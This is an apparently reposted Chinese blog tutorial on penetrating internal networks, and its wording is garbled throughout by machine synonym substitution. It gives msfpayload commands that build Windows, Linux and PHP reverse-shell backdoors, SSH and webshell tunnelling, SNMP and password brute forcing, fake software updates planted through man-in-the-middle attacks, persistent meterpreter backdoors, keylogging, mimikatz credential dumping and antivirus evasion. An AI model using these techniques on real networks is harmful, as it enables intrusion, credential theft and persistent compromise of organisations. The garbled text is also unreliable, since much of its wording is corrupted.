|
|
|
联系客服020-83701501

内网渗透随想

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
内网渗透随想

0x00 媒介

畴昔看到微博有人私信我说内网渗透的身手,zone也有很多小伙伴问了一些内网渗透的问题,以是我就大胆写了这篇文章,有舛讹的,还请各位赐正

全数内网渗透必定不是一篇两篇文章可能陈述领略的,以是题目写作随想,想到哪儿写哪儿

0x01 内网代办署理和转发

inner1
*繁杂区分一下正向代办署理和反向代办署理

1.1 正向代办署理(Forward Proxy)

Python
1 Lhost--》proxy--》Rhost

Lhost为了会面到Rhost,向proxy发送了一个苦求而且指定目的是Rhost,然后proxy向Rhost转交苦求并将失掉的形式返回给Lhost,繁杂来说正向代办署理便是proxy包揽了咱们去会面Rhost。

1.2 反向代办署理(reverse proxy)

Python
1 Lhost<--->proxy<--->firewall<--->Rhost

和正向代办署理近似(空论),Lhost只向proxy发送平居的苦求,具体让他转到那边那边,proxy各人武断,然后将返回的数据递交回来,这样的利益便是在某些防火墙只容许proxy数据收支的时辰或者有效的截止穿透

1.3 繁杂区分

正向代办署理是咱们各人(Lhost)戴套(proxy)插进去,反向代办署理是她(Rhost)被动通过上位(proxy)坐上来(Lhost)

zone里内网渗透代办署理问题有人问了如何代办署理截止内网渗透的问题
固然,要截止内网渗透,代办署理是咱们最先必要办理的问题,常见的代办署理门径或者可以分为这么几种:

2. VPN单纯/SSH单纯

这类代办署理门径必要对比高的权限(system/root)直接操作系统遵守来封闭内网代办署理的单纯,配置VPN都对比繁杂,这里不做赘述,咱们看一看通过SSH单纯截止代办署理

Default
123456789 ssh -qTfnN -L port:host:hostport -l user remote_ip   #正向单纯,监听本地portssh -qTfnN -R port:host:hostport -l user remote_ip   #反向单纯,用于内网穿透防火墙限制之类SSH -qTfnN -D port remotehost   #直接截止socks代办署理 参数详解:-q Quiet mode. 平静模式-T Disable pseudo-tty allocation. 不占用 shell 了-f Requests ssh to go to background just before command execution. 靠山运转,并保举加之 -n 参数-N Do not execute a remote command. 不执行长途敕令,端口转发就用它了~

无心候,咱们手边不有端口转发的工具,也或者通过ssh来做端口转发

Default
12 ssh -CfNg -L port1:127.0.0.1:port2 user@host    #本地转发ssh -CfNg -R port2:127.0.0.1:port1 user@host    #长途转发

大家或者参考这篇paper,特别棒 SSH Port Forwarding

3. 通过HTTP service的代办署理

繁杂来说便是在目的服务器上传一个网站shell,通过shell来做局部的流量转发到内网,常见的几个工存在reGeorg,meterpreter,tunna等等,甚至直接写一个繁杂的代办署理脚本,在各人呆板上配置一下nginx直接截止反向代办署理

  • reGeorg自带的阐明已经很领略了
    • Step 1. Upload tunnel.(aspx|ashx|jsp|php) to a 网站server (How you do that is up to you)
    • Step 2. Configure you tools to use a socks proxy, use the ip address and port you specified when you started the reGeorgSocksProxy.py

    ** Note, if you tools, such as NMap doesn’t support socks proxies, use [proxychains] (see wiki)

    • Step 3. Hack the planet

注意安装urllib3即可(regeorg很不便,我根蒂都用这个)

  • meterpreter

msf特别弱小,在截止内网渗透的时辰不失为一个好的抉择,要用它截止代办署理,或者直接生成一个可执行文件后门,然后返回meterpreter,也或者生成一个网站shell来返回meterpreter,关于meterpreter,Dm教师已经说的特别领略了metasploit 渗透测试条记(meterpreter篇)

3.1 windows生成后门

Default
1 msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe

3.2 Linux生成后门

Default
1 msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell

3.3 php后门

Default
1 msfpayload php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -e php/base64(可繁杂编码) -t raw -o base64php.php

失掉meterpreter会话后,便是msf尽情发挥的时辰了,最罕用的门径,削减路由表后,直接在会话中用msf的各种攻击模块截止扫描(注意,这里是或者截止跨网段扫描的)

假定地道只是想要截止繁杂的代办署理工作,auxiliary/server/socks4a模块即可

这里讲到meterpreter以是多说一句,畴昔说的ssh单纯,假定嫌敕令罕见记,也或者繁杂的通过msf来创建tunnel

Default
123 load meta_sshuse multi/ssh/login_password设置好参数后exploit即可失掉会话截止代办署理行使

  • 直接通过网站shell和nginx反向代办署理

http://zone.wooyun.org/content/11096

4. other tricks

python,ruby,perl等直接创建socks连贯

lcx,tunna,htran等等截止端口流量转发

shadowsocks,tor,goagent等等

直接现成的小工具:ssocks(一次比赛的时辰死猫跟我保举的)正向代办署理,反弹socks5都可

0x02 内网环境探测和信息搜集

因为一个完整的渗透很难涵盖各种环境,以是这里讲的可能对比散,根蒂凡是一些小身手和思路

  • Nmap代办署理扫描截止主机发明proxychains nmap ***假定是meterpreter会话截止的代办署理,可直接通过/usr/share/metasploit-framework/modules/auxiliary/scanner脚本来扫描即可
  • 搜检hosts失掉内网主机信息
  • 直接攻击网段路由或变幻机,繁杂绘制内网的布局(我在从TCL某缝隙看内网渗透教学分享以内网信息探测和后渗透筹办中便是失掉了cisco路由的privilege15权限,失掉了内网布局,进一步截止跨vlan攻击)
  • 多尝试变幻机snmp弱口令,一旦战败,内网布局理解理睬
  • 关于snmp渗透甚么是snmp操作了snmp贪图的装备,只必要community string即可,以是针对这个string爆破梗概社工凡是可行的,默认public/private起首截止161端口扫描,发明snmp凋谢环境,通过弱口令搜检装备信息,在oid中读取装备明码
  • inner2
  • 例子:中国移动个人华为三层变幻SNMP缝隙,可失掉贪图帐号明码,已战败登录或者通过这个nmap和msf脚本截止踊跃攻击h3c-pt-tools
  • 尝试从主机的用户目录梗概贪图运维邮箱探讨迟缓信息(某次渗透便是keylogger运维后在测试机桌面失掉到拓扑和网段)
  • inner3
  • 通过resolv.conf找到内网dns服务器,梗概字典穷举dns
  • 注意分析用户的.bash_history,个别或者分析出用户的操作风俗,记录等,失掉~/.ssh/,尝试共同history的连贯记录直接通过密钥登陆其他呆板

0x03 内网渗透的常见攻击身手

  • 通过畴昔的信息搜集和探测,武断出主要的业务呆板,如OA,dbserver,独霸ssh置信,连入呆板后导出员工的userlist,做成针对性的字典,大扫数内网的坦然性凡是柔弱的,且最容易出问题的便是口令婿然(至公司也不破例)%username%1%username%12%username%123%username%1234%username%12345%username%123456

主要对ssh,dbserver,vnc,ftp截止爆破

inner4

  • 对开了网站 service的server截止惯例渗透,有或者增加工作量的门径便是先对呆板批量辨认banner,通过banner武断出cms或中间件,直接独霸exp
  • 中间人攻击

罕用ettercap,不倡导做arp的mitm,或者尝试dhcp mitm梗概icmp mitm

也或者大方一点,挟制插件,攻击网关,梗概独霸evilgrade去编造软件更新(如notepad++),然后捆绑上后门,直接打下工作呆板,进入办公网

inner5

inner6

繁杂配置后用msf生成后门,start即可共同ettercap操作编造软件更新了

inner7

 

  • 常见服务缝隙攻击smb/ms08067/ipc$/NetBIOS…………

可是在针对这些对比陈旧的缝隙攻击时,极可能有AV拦截,以是在不同场情形到的坑都不异样

好比畴昔在西电DM牛陈述我,有AV,假定直接独霸psexec返回会话,即会拦截,这时就或者独霸powershell来bypass AV Powershell tricks::Bypass AV

0x04 后渗透筹办和扩充战果

一次完善的内网渗透必定不是可能一次性完成的,因为全数过程必要贪图员的”共同”(口胡。。。)所当前渗透筹办时颇有必要的

1. 后门筹办

msf的后门已经不错,只必要稍加改培育能够很好称心咱们的需要

平居msfpayload生成的后门不是持续性的,有利于咱们下次持续工作,以是必要一个持续性后门

msf的持续性后门有两种,通过服务发起(metsvc)和通过发起项发起(persistence)

通过服务的后门有个短处,服务称号是meterpreter,独霸门径是: 上传后门,通过metsvc安装服务

Default
12345 meterpreter > run metsvc...(设定端口,而且上传后门文件)use exploit/multi/handlerset PAYLOAD windows/metsvc_bind_tcpexploit

通过发起项的独霸门径:

Default
12345 meterpreter > run persistence -X -i 10 -p port -r hostip use multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpexploit

尽管,直接生成的后门有可能会被杀,以是这里我保举一个很不错的工具,veil,畴昔再一次小型apt中用这个生成为了的后门直接bypass了360

linux下有两个罕用的后门

mafix rookit和Cymothoa,后者据说或者克隆root用户,不过大扫数的backdoor根蒂都相等于一个加密nc,会新末尾口,以是假定网站shell存活,或者直接思量用网站shell坚持权限

2. 键盘记载

keylogger在内网渗透过程中(特别是对比大的内网),起到很关头的传染感动,因为搞定一个明码,有可能就搞定了一个网段

ixkeylog是我罕用的一个,linux>=2.63都可操作

梗概操作meterpreter会话的自带键盘记载遵守

Python
12 keyscan_start keyscan_dump

inner8

 

inner9

用meterpreter有个利益,便是在win中或者做内存注入,不会创建过程

这里说一个小tips,假定感应keylogger设施大,或者进系统后把一些你必要的贪图工具,如navicat,putty,PLSQL,SecureCRT之类悉数选成记住明码

3. hash

mimikatz,无须多说,独霸meterpreter或者直接load模块

Quarks PwDump

wce

0x05 something else

内网渗透波及的面很广,本文主要说到的是一些很繁杂的问题和惯例的思路

尚未谈到的 域渗透 打印机 办公网嗅探 入侵日志清理等等

假定无神思,然后缓缓补全

【via@坦然脉搏】

数安新闻+更多

证书相关+更多